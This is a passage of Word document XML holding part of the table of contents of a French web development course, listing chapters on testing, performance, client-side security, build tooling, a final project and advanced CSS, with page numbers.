        </w:rPr>
        <w:t>32.5 Ce qui mérite un test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>296</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>32.6 Outillage minimal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>296</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33. Performance web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>301</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.1 Mesurer ce qui compte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>301</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.2 Le poids des images</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>302</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.3 Polices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>303</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.4 Chemin critique de rendu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>303</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.5 Scripts et travail du navigateur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>304</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>33.6 Mise en cache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>304</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34. Sécurité côté client</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>309</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.1 Le modèle de menace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>309</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.2 Injection HTML et XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>309</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.3 Politique de sécurité du contenu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>310</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.4 Injection SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>311</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.5 Sessions et formulaires</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>311</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>34.6 Dépendances et chaîne d'approvisionnement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>312</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>35. Versionner, construire et outiller son projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>317</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>35.1 Git : trois zones, quatre commandes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>317</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>35.2 Structurer un dépôt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>318</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">35.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>package.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> et verrouillage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>319</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>35.4 Chaîne de construction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>320</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>35.5 Automatiser les vérifications</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>321</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36. Projet final : d'un dossier vide à un site en ligne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>325</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.1 Le projet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>325</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.2 Étape 1 : cadrer avant de coder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>325</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.3 Étape 2 : la structure HTML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>326</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.4 Étape 3 : les styles</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>327</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.5 Étape 4 : l'interactivité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>329</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.6 Étape 5 : le formulaire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>330</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.7 Étape 6 : qualité avant publication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>331</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.8 Étape 7 : publication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>332</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.9 Étape 8 : documenter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>332</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>36.10 Pour aller plus loin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>333</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie VI — Approfondissements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">37. CSS avancé : couches, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> et requêtes de conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>338</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>37.1 Le problème des feuilles de style qui vieillissent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>339</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>37.2 Les couches de cascade</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>339</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">37.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>:has()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le sélecteur relationnel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>340</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>37.4 Requêtes de conteneur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>341</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
